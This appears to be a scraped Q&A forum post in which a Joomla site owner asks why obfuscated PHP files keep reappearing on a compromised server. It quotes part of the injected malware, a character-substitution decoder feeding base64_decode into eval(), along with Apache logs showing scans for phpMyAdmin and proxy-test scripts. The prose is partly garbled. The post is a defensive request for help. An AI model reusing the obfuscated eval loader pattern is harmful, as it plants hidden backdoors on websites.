joomla - PHP file containing base64_decode shows up on server -
my server has hole somewhere, , need plug it. php file containing base64 encoded code keeps showing in joomla website.
i blacklisted @ first (kelihos listed reason) , discovered have number of php files random, human friendly (login.php, file.php, alias75.php ... ), names in joomla directory. files had main portion of script after base64_decode function. here example of listing of such file:
-rw-r--r-- 1 www-data www-data 155232 dec 24 18:51 file.php note date & time. night before christmass. same - file shows mornig @ 6 date 24th dec. can clue maybe? here snippet of actual code:
<?php function jqgwuawwjs($rlkr, $fikixpq){$wynuczq = ''; for($i=0; $i < strlen($rlkr); $i++){$wynuczq .= isset($fikixpq[$rlkr[$i]]) ? $fikixpq[$rlkr[$i]] : $rlkr[$i];} $jeb="base64_decode";return $jeb($wynuczq);} $ldo = 'dgcozsrv5id3bus9xqr9iumt59xg1zcskz0ok0ouzycoipecsx'. 'adigrdius9xqr9x9xg1puok0ouzycoipecsxadiyfhiush5ye2sgcticr6zy2cb90ayxqmxq7v5iwv'. this continues next 1900 lines & ending with:
; $zmdjyoxo = array('1'=>'i', '0'=>'w', '3'=>'o', '2'=>'1', '5'=>'z', '4'=>'q', '7'=>'b', '6'=>'0', '9'=>'y', '8'=>'6', 'a'=>'k', 'c'=>'l', 'b'=>'i', 'e'=>'n', 'd'=>'n', 'g'=>'g', 'f'=>'f', 'i'=>'b', 'h'=>'4', 'k'=>'t', 'j'=>'8', 'm'=>'x', 'l'=>'l', 'o'=>'p', 'n'=>'p', 'q'=>'m', 'p'=>'d', 's'=>'v', 'r'=>'9', 'u'=>'a', 't'=>'v', 'w'=>'r', 'v'=>'z', 'y'=>'w', 'x'=>'c', 'z'=>'a', 'a'=>'g', 'c'=>'5', 'b'=>'j', 'e'=>'t', 'd'=>'q', 'g'=>'s', 'f'=>'j', 'i'=>'x', 'h'=>'u', 'k'=>'o', 'j'=>'r', 'm'=>'7', 'l'=>'e', 'o'=>'u', 'n'=>'h', 'q'=>'k', 'p'=>'3', 's'=>'d', 'r'=>'y', 'u'=>'2', 't'=>'s', 'w'=>'h', 'v'=>'f', 'y'=>'m', 'x'=>'c', 'z'=>'e'); eval(jqgwuawwjs($ldo, $zmdjyoxo));?> when change eval print comes out (code big body of message - here link pastebin):
i deleted these files server, changed root password, mysql password, joomla password & activated two-factor authentication joomla administrator.
i noticed strange behavior month ago, before investigating problem (maybe related this) provider - host9 had catastrophic failure. left me without website & mail server 24. dec 15 - 12. jan 16 (!). then, have cron job looks these php files. of course, deleting them resolving half problem. question how these files keep popping up?
i have vps with:
ubuntu server linux 3.13.0-63-generic on x86_64
apache/2.4.7
php 5.5.9
joomla 3.4.8
the file showd after 6:00 am, include apache2 access.log @ time:
61.135.190.71 - - [27/jan/2016:22:56:31 +0000] "get / http/1.0" 200 430 "http://www.baidu.com/s?wd=www" "mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)" 208.52.154.243 - - [28/jan/2016:01:23:44 +0000] "get /dbadmin/scripts/setup.php http/1.0" 404 458 "-" "-" ::1 - - [28/jan/2016:02:56:54 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:02:56:55 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:02:56:56 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:06:43:36 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:06:56:03 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:07:11:58 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:07:12:20 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:07:12:21 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:07:12:30 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:07:12:34 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:07:13:23 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:07:13:24 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:07:13:26 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:07:26:30 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:07:26:31 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:07:26:32 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:07:29:28 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" 78.155.39.214 - - [28/jan/2016:07:47:02 +0000] "get /phpmyadmin/ http/1.1" 200 3570 "-" "mozilla/5.0 (macintosh; intel mac os x 10.11; rv:43.0) gecko/20100101 firefox/43.0" 78.155.39.214 - - [28/jan/2016:07:47:03 +0000] "get /phpmyadmin/js/messages.php?lang=en&db=&token=79eab716479466d5c44116323db94bb0 http/1.1" 200 17157 "http://207.210.201.88/phpmyadmin/" "mozilla/5.0 (macintosh; intel mac os x 10.11; rv:43.0) gecko/20100101 firefox/43.0" 78.155.39.214 - - [28/jan/2016:07:47:03 +0000] "get /phpmyadmin/phpmyadmin.css.php?server=1&token=79eab716479466d5c44116323db94bb0&nocache=4147360344ltr http/1.1" 200 17556 "http://my.ip.add.ress/phpmyadmin/" "mozilla/5.0 (macintosh; intel mac os x 10.11; rv:43.0) gecko/20100101 firefox/43.0" ::1 - - [28/jan/2016:08:03:53 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:08:03:55 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:08:03:57 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:08:04:01 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:08:04:17 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" ::1 - - [28/jan/2016:08:04:18 +0000] "options * http/1.0" 200 110 "-" "apache/2.4.7 (ubuntu) (internal dummy connection)" apache2 error.log
[mon jan 25 03:30:13.688765 2016] [:error] [pid 25830] [client 95.213.177.123:41264] script '/var/www/azenv.php' not found or unable stat, referer: https://proxyradar.com/ [mon jan 25 03:49:23.091859 2016] [:error] [pid 4517] [client 208.52.154.243:37227] script '/var/www/moadmin.php' not found or unable stat [mon jan 25 07:40:45.016456 2016] [:error] [pid 19847] [client 95.213.177.124:38892] script '/var/www/azenv.php' not found or unable stat, referer: https://proxyradar.com/ [mon jan 25 23:50:34.056409 2016] [:error] [pid 2434] [client 185.25.151.159:34885] script '/var/www/testproxy.php' not found or unable stat [tue jan 26 06:47:48.641496 2016] [:error] [pid 6043] [client 95.213.177.122:42690] script '/var/www/azenv.php' not found or unable stat, referer: https://proxyradar.com/ [tue jan 26 10:58:48.569545 2016] [:error] [pid 14076] [client 95.213.177.123:32251] script '/var/www/azenv.php' not found or unable stat, referer: https://proxyradar.com/ [tue jan 26 15:06:42.084295 2016] [core:error] [pid 25454] [client 169.229.3.91:42376] ah00135: invalid method in request c'\xfdf\x9c\xd8\x02\xb9n\xfa\x8d\xc6j(\x9c\xb0\x04\xa3% [thu jan 28 08:01:43.830310 2016] [mpm_prefork:notice] [pid 3932] ah00169: caught sigterm, shutting down [thu jan 28 08:01:44.884060 2016] [mpm_prefork:notice] [pid 26468] ah00163: apache/2.4.7 (ubuntu) configured -- resuming normal operations [thu jan 28 08:01:44.884678 2016] [core:notice] [pid 26468] ah00094: command line: '/usr/sbin/apache2' [thu jan 28 08:21:31.499215 2016] [:error] [pid 26475] [client 78.155.39.214:50308] script '/var/www/phpmyadmin.css.php' not found or unable stat
the code seems malware script , encoded protect. suggest delete using program.
try narnia gurdian , http://github.com/pilskalns/narnia-guardian
try above resource remove encoded snippet files. easy setup , easy use also. need keep patients.
Comments
Post a Comment